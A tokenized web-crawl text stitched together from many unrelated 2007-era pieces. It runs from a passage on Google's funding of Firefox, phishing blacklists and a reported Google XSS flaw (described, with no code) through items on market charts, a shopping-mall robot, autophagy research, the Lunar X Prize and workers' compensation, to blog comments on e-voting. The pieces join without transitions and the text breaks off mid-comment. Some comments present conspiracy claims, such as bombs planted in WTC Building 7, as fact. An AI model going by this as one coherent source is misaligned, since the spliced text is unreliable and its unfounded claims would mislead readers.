Given the cavalier attitude that the company has to user privacy ( tracking users via cookies , unless the user leaves a two - year gap between visits to a Google Web property ) , CustomizeGoogle is one of the few ways that users can take proactive steps to protect their own privacy online .
This begs the question : why does n't Firefox adopt the features of AdBlock Plus and CustomizeGoogle ?
While the terms of Google 's contract with Mozilla are not public , even if Mozilla were contractually free to include anti-Google - tracking features , it would not be a wise move , business - wise .
After all , it is not too smart to anger the company that provides more than 85 percent of your financing .
This is all conjecture , of course , but why else would the Firefox team not roll in the features of two extensions that are widely popular and that do so much to protect users from annoying advertisements and creepy privacy intrusions online ?
Firefox / Mozilla
Phishing Toolbars
There is a normal cycle when a new phishing site is created .
It works something like this :
A new phishing site is created and is e-mailed about to thousands of people .
Someone tips off Google , which adds it to the phishing blacklist .
Millions of Firefox browsers download the latest blacklist from Google .
Users who click on e-mails , taking them to the phishing site , receive a clear warning from Firefox , telling them that the site is malicious .
However , what happens when the phishing site is hosted by Google ?
This very issue was discussed by noted Web application security expert Robert " RSnake " Hansen in August .
RSnake discovered a cross-site scripting ( XSS ) flaw in Google 's gmodules.com
Web site .
The security flaw , which has yet to be fixed , was dismissed by the Google security team , which claimed that it was , in fact , an intended design feature .
RSnake described the significance of the vulnerability , stating that the exploit would allow someone " to take over other people 's Web sites when they embedded the erroneous third - party code .
Kinda nasty .
Unlikely , but nasty .
More likely , it would simply be in phishing sites that did n't want their sites taken down , but wanted Google 's to be taken down instead . "
This brings us to a really interesting dilemma .
Google has a well - known flaw in one of its
Web sites that can be ( ab) used by phishers and malicious hackers .
Google refuses to fix the flaw , as it believes that it is not a problem .
Google also operates the Firefox phishing blacklist .
Will Google add one of its own domains to the phishing blacklist ?
Of course not !
RSnake , who worked in the antiphishing blacklist area for some time , makes several claims .
On his blog , he wrote that " the browser companies have to maintain a list of sites that are n't phishing sites but often get flagged as phishing sites .
Google happens to host a lot of those .
In reality , Google is being used to phish consumers or redirect to them to phishing sites , but Google does n't really fix this problem .
Instead , it tells the browser companies to whitelist its sites , regardless of the fact that consumers are losing their identities as a direct result of Google 's actions in two ways : 1 ) because it has not ended the vulnerability and 2 ) because of its insistence in being marked as a ' good ' site . "
Essentially , what he claims is that with Google 's rather menacing legal department , no other competing antiphishing company will dare to include a Google - owned domain on a blacklist .
In addition , Google 's domains get included on a whitelist shipped with antiphishing software , which is a list of domains that will never cause warnings .
RSnake further claims that in addition to intimidating the other firms in the market , Google refuses to include its own Web properties in the Firefox phishing blacklist , which it maintains .
While RSnake does nothing to hide his lack of love for the big G , his reputation in the Web application security arena is top - notch .
Furthermore , in the two months since RSnake first made his concerns public , no one from Google has publicly disputed anything he has said .
With Google providing the blacklists for the new antimalware features in Firefox 3.0 , we should all be asking : Can we trust Google ?
To paraphrase the old phrase , who will blacklist the blacklisters ?
With control of hundreds of millions of Firefox browsers , what incentive does Google have to keep its own Web properties free of phishing sites ?
A number of edits were made to this blog post on the evening of November 1 2007 , to reflect feedback received from Mozilla Corp employees .
The following edits were made :
Original : " This includes Ben Goodger , the lead developer for the browser .
Yes , other companies pay developers to work on Firefox , but none throw as many resources at the browser . "
Now : " This includes Ben Goodger , the former lead developer , and still major contributor for the browser .
Yes , other companies pay developers to work on Firefox , but none throw as many overall corporate resources at the browser . "
The following text was removed from the introductory paragraph : " When the Big G wants some technology in Firefox , a patch gets applied . "
- Several Google developed features ( including Safe Browsing / Phishing Protection ) are now in the mainstream browser , however , this sentence could be read in many ways , and so it seemed best to remove it .
This paragraph was removed " Fact : While Mozilla 's , it is highly unlikely that Mozilla will shift to another search engine , even if paid more .
The simple reason for this is that lots of users like the Google search experience .
If Firefox switched , say , for example , to MSN Live Search , many users would be up in arms .
Thus , while Mozilla can keep taking Google 's money , it can't realistically switch the default search engine to any other Web site . " - I erred in placing this in the " Fact " section , when in fact it should have been noted as a conjecture .
In any case , it has been removed completely .
Historical Financial Charts : Are You Invested In These Markets ?
I ’m somewhat of a chart freak , but not as sophisticated as those who ’ve gotten into the chart reading business of stock market technical analysis .
What I do enjoy are the visual diagrams that give us the big picture from a chaotic bunch of financial data , giving us the low down in one glance .
I like how simple charts can give you a quick low down of what ’s transpired throughout the years ( or even decades ) .
If you ’re a long term investor , you may be able to appreciate the full view of how money has been minted throughout time .
A stock market graph can easily remind us of just how much risk there actually is when you entrust your money to the markets .
These charts show us those times when greed or fear take over — and also make us appreciate those periods when there ’s at least , some level of stability ( which hardly lasts too long ) .
On the other hand , technical analysts and traders enjoy these charts as these form the foundation of their work .
They ride the markets like any cowboy does a bull , and either make a ton or lose a shirt .
It ’s all part of the game .
But enough of my musings .
I ’ve collected some interesting charts that represent how money has behaved for us in the last several decades and which tell us stories of prosperity between bouts of volatility , as marked throughout history .
I picked up these charts from various sources ( with permission ) , which I ’ve pointed out at the end of this post .
Note that I am not a technical expert of the markets by any means , so please feel free to correct , clarify or further discuss any notions I ’ve presented here .
Click on each picture for an enlarged version .
U.S. Stock Market Charts
Representing the United States Market , this is how the Dow Jones Industrial Average has performed in the last 107 years ( 1900 – 2006 , Monthly ) :
Here ’s another look at the DJIA in the last 105 years ( 1900 – 2005 ) :
This image is from The Big Picture , where they fashioned the chart to show differing market activity in color : Green for bullish periods and Red for bearish times .
These are additional charts for the other US market indices : S & P ( 1960 – 2006 Weekly Chart ) , Nasdaq ( 1978 – 2006 Weekly Chart ) .
-ooOoo -
U.S. Bonds , Historical Charts
Bond Yields Chart , Yearly ( 1960 – 2000 )
30 Year Treasury Bond Prices , Monthly ( 1978 – 2007 )
It may be a little trickier to see the details on these bond charts , but I encourage you to click on the images for clearer display .
What ’s interesting here is that it shows how bond prices behave with respect to bond yields throughout the years : they move in opposite directions .
As bond yields and interest rates go up , the bond prices move down .
And in this case , you see the marked opposing behavior with these patterns throughout the 1980’s .
Bond yields peaked while bond prices slumped along the same time .
If you invert the bond price chart , you can see how closely it looks like the bond yield chart in reverse .
-ooOoo -
Gold Prices , Yearly ( 1975 – 2007 )
Gold peaked sometime in 1980 and plummeted in the years after .
Now it seems to have recovered nicely , but what could be in store for it ?
For closer looks at gold ’s historical prices , you can check the 30 year span here , or one covering 1980 – 2006 ( monthly ) .
-ooOoo -
Nikkei Index ( Japan Stock Market ) , Yearly ( 1970 – 2007 )
In my mind , this is the scariest chart from the macroeconomic sense .
It has bucked long term growth trends by moving downwards and shows that even a large market can plateau indefinitely .
The last 7 years shows how much Japan tracked the U.S. equity market .
Looking back the previous 30 years , they ’re very different animals .
-ooOoo -
China Shanghai Composite , Yearly ( 1991 – 2007 )
Though the Shanghai Exchange has been around for over a century , it has only existed in its present form since the end of 1990 .
Looking at it , it looks crazier than the irrationally exuberant U.S. dot com boom .
We all know of course what happens to a wild boom like this in the course of a few years .
Let ’s see how it does in the near future .
With China ’s hot economy , hungry consumers and strong demand for everything , how long will this market defy normal market behaviors and valuations ?
Some of you may argue that this is what “ scary ” looks like .
More on the Shanghai Stock Exchange here .
-ooOoo -
U.S. Real Estate Historical Prices ( 1890 – 2007 )
This historical housing chart has been making the rounds of the net .
I have seen it at BiggerPockets.com and GetRichSlowly.org .
Here ’s why so many people have gotten rich — by means of owning their own home .
But this looks like it ’s ripe for a change ; in fact , the shifts are already occurring , with regular news of foreclosures , subprime mortgages gone sour and sluggish sales .
Want to know what it feels like to ride this roller coaster ?
Then hop on board !
One more thing , is it just my eyes or does the Chinese stock market look similar to the U.S. property market ?
-ooOoo -
I just showed you the long term price and performance charts that have spanned decades and which represent developed and developing equity markets as well as bond , commodities and property markets .
What do these pictures tell us ?
As expected , it appears that the U.S. ’ developed markets have been the most well behaved in terms of being the most upwardly predictable and the least choppy .
I ’ll say this is the reason why most of my bucks are still in the U.S .
And except for the case of Japan ( and arguably , gold ) , all other markets have moved up in the LONG term .
Still , there ’s a lot of volatility along the way with periods of boom and bust that would ’ve caught you off guard if you did n’t have a plan .
If you decide to pull out of the markets at a time when you HAVE to , such as when life circumstances dictate , you face the risk of selling at the wrong moment .
This is the reason why conventional investment advice tells us to sit tight for the long term and keep our money in the market in a diversified fashion .
With proper asset allocation across all these markets , your diversification strategies will help reduce your risk while you ride your investments to higher ground as time goes on .
Image credits go to these great sources for financial charts ( thanks to Nick Laird , et al ) : Sharelynx.com , ChartsRUs.com , GoldMarketData.com , StockCharts.com , Kitco.com ( Kitco Bullion Dealers ) .
Copyright © 2007 The Digerati Life .
All Rights Reserved .
The Osaka - based Advanced Telecommunications Research Institute ( ATR ) has developed a crowd - monitoring humanoid robot that recognizes when people are lost and helps them find their way .
In a series of demonstrations conducted from January 22 to 24 , a souped - up version of ATR 's Robovie humanoid robot monitored people as they passed through a 100 square meter ( 1,076 sq ft ) section of the Universal Citywalk Osaka shopping center .
Relying on data from 16 cameras , 6 laser range finders and 9 RFID tag readers installed in and around the area , the robot was able to watch up to 20 people at a time , pinpoint their locations to within a few centimeters , and classify each individual 's behavior into one of 10 categories ( waiting , wandering , walking fast , running , etc. ) .
Whenever Robovie spotted people who looked disoriented , the child - sized droid wheeled up to them and asked , " Are you lost ? "
If so , the robot provided simple directions to the destination and pointed the way .
If not , the robot proceeded to recommend nearby shops and restaurants .
ATR says the Robovie test is the first in a long series of robot - related demonstrations to be conducted at Universal Citywalk Osaka .
This week , the company announced it was establishing a permanent base in the shopping center , which will serve as a real - world environment for testing new robot - oriented business ideas .
In June , the company plans to start hiring out its machines to companies toying with the idea of employing robots .
[ Sources : Robot Watch , Yomiuri , Nikkei ]
A worker carries a coffin at Vic Fearn and Company in Nottingham , central England November 2 , 2007 .
REUTERS / Darren Staples
VILNIUS ( Reuters ) - Police in the Lithuanian city of Klaipeda were baffled to discover that a woman arrested for shoplifting last weekend had been registered as dead a month earlier .
The woman ’s parents had mistakenly identified a body found in a forest as that of their 27 - year - old daughter , Natalya Pavlova , who disappeared from home in November , police said on Wednesday .
It emerged that Pavlova was alive and well and living with her boyfriend in the same town .
“ Her parents identified the corpse as their daughter .
What could we do ? ” Petras Mikalauskis , a deputy police chief for the area , told Reuters .
“ It was the first such case in my experience . ”
The real identity of the dead woman was not known .
The police have launched an investigation .
These information pages are a readable introduction to the subject of circumcision .
They are intended to complement the technical literature that is available in the Circumcision Reference Library .
Whether or not circumcision should be performed is a controversial question , especially as religious issues may be involved .
One of the aims of the Circumcision Information Pages is to provide parents with information to assist them , if and when they are confronted with this question .
Parents are especially referred to the FAQ , or Frequently Asked Questions file .
This site has links to information on the rights of the child , religious issues , and related issues .
Where can I find it ?
Here is the table of contents for the Circumcision Information Pages .
Please visit our sponsor
Please also visit
Ridged Band
A site focused on anatomy , and the role of the foreskin's
ridged band in sexual arousal .
( March 2001 )
The Circumcision Information and Resource Pages are a not - for - profit educational resource and library .
Tilted Media Group , Inc. is not responsible for the content of this site .
CIRP makes documents available without charge , for informational purposes only .
The contents of this site are not intended to replace the professional medical or legal advice of a licensed practitioner .
special to IFP
by IFP cofounder Mikael Rudolph
Florida Representative and House Judiciary Committee member Robert Wexler ( D ) has taken a leadership position in demanding impeachment hearings against Vice President Dick Cheney begin immediately .
From his new website : www.wexlerwantshearings.com: “ The charges are too serious to ignore .
There is credible evidence that the Vice President abused the power of his office , and not only brought us into an unneccesary war but violated the civil liberties and privacy of American citizens .
It is the constitutional duty of Congress to hold impeachment hearings . ”
Suppressing a cellular cleanup - mechanism known as autophagy can accelerate the accumulation of protein aggregates that leads to neural degeneration .
In an upcoming issue of Autophagy , scientists at the Salk Institute for Biological Studies report for the first time that the opposite is true as well : Boosting autophagy in the nervous system of fruit flies prevented the age - dependent accumulation of cellular damage in neurons and promoted longevity .
" We discovered that levels of several key pathway members are reduced in Drosophila neural tissue as a normal part of aging , " says senior author Kim Finley , Ph.D. , a scientist in the Cellular Neurobiology Laboratory , " which suggests there is an age - dependent suppression of autophagy that may be a contributing factor for human neurodegenerative disorders like Alzheimer 's disease . "
As the American population grows older , questions regarding the aging process and how it can be positively influenced are increasingly becoming the focus of scientific research and public interest .
The age - related accumulation of proteins and lipids damaged by chemically aggressive forms of oxygen is considered by most in the geriatrics field to be a normal part of the aging process .
As a result in most age - associated diseases , such as Alzheimer 's , damaged proteins accumulate in excessive amounts , which leads to progressive cell death in the brain .
All cells undergo autophagy -- literally self - eating , -- which requires the assembly of specialized vesicles called autophagosomes .
These vesicles surround or engulf damaged cellular proteins or structures and then traffic the " bagged garbage " to a second group of vesicles , which disposes of the trash with the help of digestive enzymes .
This process can be enhanced when animals are placed on a calorie - restricted diet , a regime known to extend lifespan .
" The activation of autophagy facilitates the removal of damaged molecules that accumulate during cellular aging , " says Finley .
" This may be particularly important in the nervous system since neurons produce damaged molecules at a much higher rate than most cell types . "
Keeping cells free of damaged molecules is critical for neurons because unlike many cells , they do not divide or replace themselves once created at birth .
" They rely on autophagy together with other clearance and detoxification pathways to keep themselves healthy and functioning for decades , " explains Finley .
For their studies , the Salk researchers turned to the fruit fly Drosophila , a powerful model organism , whose genetics can easily be manipulated .
When initial experiments indicated that the expression of several autophagy genes decreased over the normal lifespan of fruit flies , the Salk researchers focused on one particular protein , Atg8a .
This protein is an essential component needed for the formation of new autophagosomes .
Finley and her team found that levels of Atg8a were significantly reduced by four weeks of age , a time when the flies are considered middle aged .
At the same time , protein aggregates were not efficiently cleared by the cellular clean - up crew and started to accumulate .
Without Atg8a , things went from bad to worse .
Damaged proteins tagged for degradation started to pile up early and life expectancy plummeted .
" The abnormal accumulation of protein aggregates had striking similarities to those seen in the most common human neurodegenerative diseases , " says first author Anne Simonsen , Ph.D. , a visiting scientist from the University of Oslo , Norway .
When the researchers kept the neuronal levels of Atg8a high , the genetically engineered flies were spared the ravages of time .
Promoting the pathway not only prevented the accumulation of protein aggregates but also significantly extended the average lifespan .
" Our experiments show for the first time genetically that autophagy can sequester and eliminate misfolded and damaged proteins , which accumulate in neurons as normal part of the aging process , " says Simonsen , " but most importantly they demonstrate that enhancing the clearance of damaged proteins and protein aggregates increases longevity . "
Insulin signaling and caloric restriction are two major determinants of longevity and they also impact the activity level of autophagy .
Therefore , regulating autophagy , the pathway that directly does the cleanup work , may be the key factor in controlling the aging process , the researchers say .
" By maintaining the expression of a rate - limiting autophagy gene in the aging nervous system there is a dramatic extension of lifespan and resistance to age - associated oxidative stress , " says Finley .
Researchers who also contributed to the study include post - doctoral researcher and co-first author Robert C. Cumming , formerly in the Cellular Neurobiology Laboratory at the Salk Institute and now at the University of Western Ontario , Canada , and researchers Andreas Brech , Ph.D. , and Pauline Isakson , Ph.D. , both at the University of Oslo , Norway , and professor David R. Schubert in the Cellular Neurobiology Laboratory .
This image was lost some time after publication , but you can still view it here .
In an internal email issued this afternoon , Los Angeles Associated Press assistant bureau chief Frank Baker notified his staff of a major policy change .
" Now and for the foreseeable future , " he wrote , " virtually everything involving Britney is a big deal . "
OMG , did you hear ?
Britney is a BIG DEAL , y'all !
Nervous breakdowns are totes the most efficient way to achieve household name status .
Memo after the jump .
Italian scientists said they have discovered how to achieve an " atomic laser " envisioned by Albert Einstein in 1925 .
Lasers , as they exist now , are concentrated streams of light particles , or photons .
The discovery by Florence University researchers will produce lasers of atoms , rather than photons , which was previously impossible because scientists could n't find a way to stop atoms from bouncing into one another , the Italian news agency ANSA reported Friday .
An atomic laser is eagerly awaited in the field of micro-electronics , said lead scientist Massimo Inguscio .
Inguscio's team used potassium isotopes to build an " atomic condensate " squeezed into a harmonious whole by a magnetic field , similar to a theoretical model envisioned by Einstein and his colleague Satyendra Nath Bose , Inguscio said .
" In this way the interaction of atoms is virtually nonexistent , " Inguscio said .
Copyright 2007 by United Press International
Moon 2.0 has its first startup .
The Google Lunar X - Prize folks held an event at a space investment conference in San Jose to announce their first fully - registered competitor .
Odyssey Moon , a startup based on the Isle of Man , and run by Carl Sagan mentee , Bob Richards and the CFO of satellite - provider Inmarsat , Ramin Khadem , plans to land a rover on the moon within the next seven years .
" For Odyssey Moon , the race is just the beginning .
It is our intention to seed and then lead private lunar commercial enterprise . " said Richards .
" It 's our goal to lower the cost of lunar access by an order of magnitude . "
The lunar prize , launched in September at Wired NextFest , offers $ 30
million to the first private company to reach the moon with a rover by December 31st , 2014 .
X - Prize founder , Peter Diamandis , said he expected a variety of competitors and that someone would win the prize .
" We 'll see the first attempts to win this competition within the next four years , " said Diamandis , " I would expect we 'd see a half dozen teams fully - registered by the middle of 08 . "
Other competitors , like Red Whittaker , have announced they will enter the competition , but Odyssey Moon is the first to have completed its registration , which includes a small monetary deposit .
Reporters ( and we were here like flies : BBC , LA Times , SJ Mercury News , SF Chronicle , TV channels , etc ) did n't let the team off easy with a quick pat on the back .
They hassled Odyssey Moon executives for financial and technical details , which the company 's representatives said they were n't ready to discuss .
Eventually Khadem did provide a small nugget of information .
" Are we fully funded ?
No , we 're not , " he said .
Khadem also stressed that Odyssey Moon is not being custom built to win the moon prize .
" We believe we have a robust business case even if we do n't win the prize , " he said .
" The prize is a bonus . "
Given the lack of detail , the press conference was a bit triumphant , even featuring signs that showed today 's date and the tagline , " History Restarts . "
For someone who has heard a fair amount of startups ' hype , it seemed more like History Repeats .
Image : Alexis Madrigal .
From left to right , the three visible individuals are Khadem , Richards , and Diamandis .
They are standing in front of the enormous fake moon that the Google Lunar X Prize trots out for press conferences .
See Also :
Robotics Professor Pushing Ad Supported Moon Landing
Startups Woo VCs With Rocket Racing , Space SuitsGoogle Offers $ 20 Million X Prize to Put Robot on Moon
American sports feature way too many pads and helmets and , you know , rules , so we 've scoured the globe for the most awesome - and often terrifying - alternatives .
10 The Cooper 's Hill Cheese Rolling and Wake
Where :
A small corner of the British Isles that time and genetics forgot .
What is it ?
It involves up to 20 competitors chasing a block of cheese down a hill .
No , really .
Continue Reading Below Advertisement
The competitors climb up to the top of the almost - impossibly steep Cooper 's Hill and chase a large not - quite - round wheel of double Gloucester cheese down to the bottom .
The winner is the first person over the line at the bottom of the slope , but theoretically , the winner is supposed to be the person who catches the cheese .
The cheese , which is given a one - second head start , reaches speeds in excess of 70 miles an hour , so unless a competitor is the T - 1000 , or has managed to smuggle a motorcycle to the top of the hill , it 's not gonna happen .
Terrible injuries , however , are common .
Origins :
No one quite knows when the game started , but it is at least 200 years old , though some say it goes back further and was part of a pagan healing ritual .
Apparently to pagans , healing rituals meant hurting yourself really badly .
Continue Reading Below Advertisement
Interesting fact :
After the final race , candy is thrown down the hill for a children ' ' scramble . '
This has been attacked by children ' charities as being highly dangerous , but has been praised by almost everyone else as being very funny .
“ We understand that people are frustrated by how long the process takes , ” said Shelby Hallmark , director of workers ’ compensation programs at the Department of Labor .
He added that a substantial number of workers or their survivors may still not be aware of the program and have not yet filed claims , “ but over all , this program is working well . ”
Image Despite colon cancer and spots on his lungs , Russell Earley has been denied compensation .
Credit ... Fred R. Conrad / The New York Times
Some sick workers in western New York , however , say too many claims are being denied without proper cause .
“ For God ’s sake , if somebody deserves it and has as much proof as we have , there ’s no reason at all that they should n’t be compensated , ” said Edwin Walker , 74 , who worked at Bethlehem Steel in Lackawanna from 1951 to 1954 .
He repaired furnaces and cooling beds where uranium ingots were shaped into rods .
Now he has bladder cancer .
While pursuing his claim for compensation , he has become an unofficial spokesman for more than 300 Bethlehem retirees fighting for compensation and care .
“ We were told that to get compensated we would have to prove that we were diagnosed with cancer and that we worked there at the time , ” Mr. Walker said .
“ Those were the two criteria .
That ’s all they told us . ”
It can be difficult for workers to understand how much proof the government needs .
Russell Earley , 83 , operated a crane at Bethlehem Steel from 1941 to 1983 , when he had surgery for colon cancer .
In 2006 doctors told him he had a suspicious spot on each lung .
His compensation claim has been denied twice .
“ They took 24 inches of intestines , sewed my rectum up and hung a colostomy bag on me , ” he said .
“ And when they denied me , they said , ‘ Sickness not bad enough . ’
Can you imagine ? ”
Under the program , workers exposed to radiation can receive compensation two ways .
They can apply individually , using employment , medical and exposure records to link their work to the cancer they developed .
Government doctors and scientists at the National Institute for Occupational Safety and Health then analyze the data to determine whether it is more likely than not that the disease was caused by the radiation .
At the outset of the program in 2000 , officials believed that only 10 percent of claims would be approved .
READER COMMENTS ON
" NY TIMES MAGAZINE RUNS 'MASSIVE , SCARY ' COVER STORY ON AMERICA'S E-VOTING DISASTER "
( 49 Responses so far ... )
COMMENT # 1 [ Permalink ]
... Mark T said on 1/4/2008 @ 7:14 pm PT ...
Vote fraud , yet another infringement on our rights by the gov't .
Add it to the ever - growing list of violations :
They violate the 1st Amendment by opening mail , caging demonstrators and banning books like America Deceived ( book ) from Amazon .
They violate the 2nd Amendment by confiscating guns during Katrina .
They violate the 4th Amendment by conducting warrant - less wiretaps .
They violate the 5th and 6th Amendment by suspending habeas corpus .
They violate the 8th Amendment by torturing .
They violate the entire Constitution by starting 2 illegal wars based on lies and on behalf of a foriegn gov't .
Support Dr. Ron Paul and save this country .
COMMENT # 2 [ Permalink ]
... Agent 99 said on 1/4/2008 @ 7:23 pm PT ...
Make that " election fraud " , Mark .
COMMENT # 3 [ Permalink ]
... jen said on 1/4/2008 @ 8:28 pm PT ...
They 're right on schedule , are n't they ?
Soon as it looks as if Dems may win the WH , suddenly Corpress will alert the entire country to the dangers of e-voting .
If a Dem wins , we are going to see contested election results all over the friggin ' country .
Asshats .
COMMENT # 4 [ Permalink ]
... Grizzly Bear Dancer said on 1/4/2008 @ 8:29 pm PT ...
People in government are such nice honest people especially at the FEDERAL level with their good intentions exemplified by their every action and heck , their god is channeling them constantly with good ideas .
If you review 7 years of bush / cheney policy changes and leadership , you will agree that their interests are being protected .
Just trust them , thank them with emails , and bless their hearts because they are fighting an enemy that had an idea to fly airplanes into FEDERAL BUILDINGS .
That 's because these Arab tERRORIST types do n't like our freedom or democracy .
But thanks to bush and cheney , we 're going to make sure Iraq has our style of democracy .
Unfortunately , Federal World Trade Tower Building # 7 did n't have Arab hijackers or airplanes to crash into it before the bombs planted in the steel concrete building caused it's 6 second collapse into dust 10 1/2 hours after the FEDERAL WORLD TRADE TWIN TOWERS fell .
So only concentrate on the Twin Towers when you think about 9/11 like the corporate mass media and no worries .
Just feel good that the bush / cheney government alquada thwarters have kept America safe from any other FEDERAL BUILDING attacks .
2008 - U.S. people abolish electronic computer voting machines or enjoy the corporate 1 % er criminal lier candidate installed as your leader .
2008 - U.S. people order the Bush / Cheney administration to be prosecuted in a world court for 9/11 war crimes , ordering the bombing attacks of Iraq and Afganistan , and the subsequent invasion / occupation responsible for the deaths of thousands and thousands of families , almost 4000 military deaths , and 3000 American civilian deaths on 9/11/2001 for their own personal gain .
COMMENT #5 [ Permalink ]
... JB said on 1/4/2008 @ 8:45 pm PT ...
They have already been up to their old / new tricks this election cycle .
Tip of the iceberg ... Dems vs Reps=you have no choice but the chosen pukes .
This story may not even run .
I 'm voting for Dr.Ron Paul with a paper ballot .
These machines have been a fraud since day 1 .
COMMENT #6 [ Permalink ]
... Stu said on 1/4/2008 @ 9:42 pm PT ...
The elite have been " stealing " the election for many decades .
Actually is could only be considered " stealing " if there was actually any legitimacy in the first place .
It is just a game the elite like to play with the sheeple .
Unfortunately the sheeple keep playing it and asking for more .
The candidates ( puppets ) have been promising change for decades , but things are actually getting worse .
The sheeple have been protesting against this or that candidate for decades , the only problem they have only been fighting against other sheeple instead of the elite .
It is like going to a movie 10 times and expecting it to be different each time .
It is time to wake up .
A politician is a politician .
COMMENT # 7 [ Permalink ]
... James Hamilton said on 1/4/2008 @ 11:16 pm PT ...
So what else is new .... This BS all started with the Kennedy killing ...... how many times has a president been elected by the people since then ......????????
Bus and his fathers crones stole bioth elections outright ... they got sloppy and greedy which is always the downfall of evil men .... Soon the wicked witch is dead but this time she will burn instead of melt ....... And so goes the Phoenix .......
COMMENT #8 [ Permalink ]
... Dredd said on 1/5/2008 @ 2:55 am PT ...
Brad asks :
Better late than never ?
It begs the question , is the MSM finally in the realm of the EI movement blogs like Bradblog , Velvet Revolution , and Black box voting ( to name a tiny few ) ?
No .
A careful reading of the landscape , such as Agent 99 did at post # 2 , will lead to the pondering of what Jen # 3 posted , which I think is the crux of the matter .
We have been bemoaning the advent of Amurka , which blotted out America thru the prostitution by the MSM spreading their deceit infected legs to fascist leaning government propaganda .
We have been bemoaning the MSM 's utter contempt for us as we have promoted the obvious ( electronic machines are a f**king disaster ) reality .
Now we cannot , thru the intoxication of hope , look the other way .
Nevertheless , the proper amount of hope which Brad signals , is the only door we have to exit Amurka and get back into America .
The odds are that STU # 6 is correct , but as Forrest Gump once said " your chances of winning the lottery go up astronomically if you buy a ticket " .
But ... is the lottery rigged ...?
COMMENT #9 [ Permalink ]
... Dredd said on 1/5/2008 @ 3:45 am PT ...
The MSM today seems to be the cup within which the spirit of the Loyalists dwells .
Like the Loyalists of olde , they accuse their opponents of being disloyal .
And that is correct , but it misses the point .
The point is what are we loyal or disloyal to ?
They were loyal to King George as the MSM presstitutes still are today , and we were loyal to the principles of the Bill of Rights , as we still are today .
To hell with their bill of wrongs in their Amurkan Constitution , and to heaven with our Bill of Rights in our American Constitution !
You may steal our elections and impose your bill of wrongs for awhile , but you can not take the spirit of the Bill of Rights from Americans forever .
COMMENT # 10 [ Permalink ]
... Dredd said on 1/5/2008 @ 4:43 am PT ...
Jen # 3
What makes your premise all the more believable is the timing of a massive propaganda campaign initiated by the apologists in the military indistrial complex ... thru their media whores of course .
They are now saying we won the Vietnam war and the Iraq war :
Right - wing pundit Michael Barone has published a column on the surge in Iraq that may be the clearest expression so far of the American triumphalism over the U.S. military and Iraq that emerged in 2007 .
The current popularity of that idea reflects the degree to which the apologists for war , having been discredited earlier on Iraq , are now on the offensive ... the United States actually won the Vietnam War , and it was all because of the brilliant strategy of Gen. Creighton Abrams .
( Gareth Porter at Huffpo , emphasis added ) .
Yep , if every " turrist " ( i.e. anything that moves ) is killed there will be no more " violence " .
It figures right into the mechanisms of deceit that are the greatest business in Amurka today .
COMMENT # 11 [ Permalink ]
... Bev Harris said on 1/5/2008 @ 7:24 am PT ...
The article achieves a broad goal of helping the public realize that something is amiss , but then goes astray .
It asserts , basically , that if optical scan machines are used all will be well .
The issue is counting votes in secret , not which kind of secret counting mechanism to use .
The article misses the obvious real risk --- insider ability to change results without detection --- in order to talk about whether a " hack " ( outside attack ) has been proven .
The real issues are whether the public can see the chain of custody and whether the public can see the counting .
And right now , the public is n't even allowed to see what goes into the counter to compare it with what comes out !
Focusing the issue on which kind of black box to use misses the point : Votes are being counted in secret and insiders control the secret counting .
And its conclusions about how this came to be in the first place come close to whitewash .
Everyone had good intentions , no questioning of the " experts " who approved this stuff , or of the fact that the same people are still running the show .
The good news is this :
As the public becomes more aware of the general issue , there are always many members of the public who have the common sense to ask the right questions .
COMMENT # 12 [ Permalink ]
... Jmac said on 1/5/2008 @ 7:42 am PT ...
Just read the NYT article , available now online .
Nothing new to readers of the Brad Blog ( even occasional visitors , like myself ) , except that it 's the Sunday NYTimes Magazine .
Unfortunately , the overall tone of the article strikes me as somewhat dismissive ( e.g. , " The earliest critiques of digital voting booths came from the fringe .
. . scared - senseless computer geeks " ) .
Golly darn , every technology 's got some problems , do n't it ?
It 's also highly anecdotal , and while it hints at the possibility of intentional large - scale fraud , it skirts this issue .
Nor does it dig into the political leanings of the ownership of the major e-vote manufacturers .
( No mention of the curious observation that most " accidental errors " seem to favor conservatives .
. . )
And how an article on this subject , of this length , can fail to mention The Brad Blog is beyond me ( but I guess that 's just the MSM for you ) .
Nevertheless , while those who have been following the matter for years may be disappointed with Thompson 's article , it may be at about the right level for introducing the issue to those who have n't been watching .
It 'll be interesting and informative to see what reaction this article generates .
COMMENT # 13 [ Permalink ]
... groucho said on 1/5/2008 @ 8:32 am PT ...
When asked in 1976 whether the CIA had ever told journalists , working as its paid agents , what to write , former CIA director William Colby replied , " Oh , sure , all the time . "
I suppose I should be excited that something is being exposed , but just what is their purpose ?
I do not trust anything coming from the M$M .
Whatever their agenda is wo n't be good for us .
Could this be the seed to suspend the elections ?
If we were to experience another false flag attack , coupled with the exposure of the E-voting fraud would that be enough for them to state that until order can be restored and proper election system put in place , to up - hold the integrity ( puke here ) of the democratic system ... blah , blah , blah ...
Whatever it is think the worst and multiply it a thousand times and you might come close .
COMMENT # 14 [ Permalink ]
... Brett said on 1/5/2008 @ 8:58 am PT ...
Here is the article :
http://www.afterdowningstreet.org/?q=node/29825
COMMENT # 15 [ Permalink ]
... Stu said on 1/5/2008 @ 9:41 am PT ...
The real scary part is that the populace actually think that voting can be changed .
It has always been one of the things the elite use to keep the sheeple busy .
Years ago there used to be a myth that anybody could grow up and be Pres .
The only way you can be pres is if you are related to most of the previous pres and thus related to the British Crown and have Rockefeller 's blessing ( both Dem and Rep ) .
Bush said it best when he said the Constitution was worthless .
This was a statement of fact instead of a wish .
The constitution is worthless because it has always been worthless .
It was only put there to keep the populace happy .
Amerika was founded by the elite for the elite .
We the sheeple are only cannon fodder .
Everything in the " democratic " process is an illusion .
In fact everything we see today is an illusion .
Hey if I am wrong , I am wrong , at least I will see it coming .
The sheeple on the other hand are in for a rude awakening if I am right .
The sheeple need to remove the tunnel vision for their eyes .
There are many symptoms of the problems , but only one problem .
The sheeple need to get their eyes off of the different symptoms ( of which there will always be more and more ) and instead focus on the problem ( the elite ) .
As long as the sheeple focus on the symptoms the elite will continue to feed them to us .
SHEEPLE it is time to WAKE UP .
Just as we have seen over the many decades that whether we " vote " Dem or Rep things always get worse , this is the only change that actually takes place .
This is still like watching a movie several times and expecting it to change each time .
SHEEPLE it is time to WAKE UP .
COMMENT # 16 [ Permalink ]
... Pat # 1 said on 1/5/2008 @ 10:16 am PT ...
So ... somebody please tell us what needs to be done ... in terms of actually fixing this problem .
The answers have to be simple and to the point .
1 .
2 .
3 .
Can anyone put the solutions inside of these three ?
COMMENT # 17 [ Permalink ]
... Pat # 1 said on 1/5/2008 @ 10:21 am PT ...
... my answers are not palatable .
COMMENT # 18 [ Permalink ]
